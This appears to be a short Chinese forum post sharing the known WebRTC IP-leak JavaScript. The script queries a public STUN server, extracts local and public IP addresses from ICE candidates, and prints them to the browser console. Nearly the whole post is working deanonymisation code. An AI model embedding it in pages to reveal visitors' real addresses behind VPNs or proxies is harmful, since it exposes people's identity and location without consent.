发现通过 webRTC 可以绕过获取真实IP,可怕,放代码…
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64
| function getIPs(callback){ var ip_dups = {};
var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; var useWebKit = !!window.webkitRTCPeerConnection;
if(!RTCPeerConnection){ var win = iframe.contentWindow; RTCPeerConnection = win.RTCPeerConnection || win.mozRTCPeerConnection || win.webkitRTCPeerConnection; useWebKit = !!win.webkitRTCPeerConnection; }
var mediaConstraints = { optional: [{RtpDataChannels: true}] };
var servers = {iceServers: [{urls: "stun:stun.l.google.com:19302"}]};
var pc = new RTCPeerConnection(servers, mediaConstraints);
function handleCandidate(candidate){ var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/ var ip_addr = ip_regex.exec(candidate) && ip_regex.exec(candidate)[1];
if(!ip_addr) return; if(ip_dups[ip_addr] === undefined) callback(ip_addr);
ip_dups[ip_addr] = true; }
pc.onicecandidate = function(ice){ if(ice.candidate) handleCandidate(ice.candidate.candidate); };
pc.createDataChannel("");
pc.createOffer(function(result){
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
setTimeout(function(){ var lines = pc.localDescription.sdp.split('\n');
lines.forEach(function(line){ if(line.indexOf('a=candidate:') === 0) handleCandidate(line); }); }, 1000); }
getIPs(function(ip){ ip && console.log(ip); });
|
丢入控制台运行就出来了,各位不要搞事~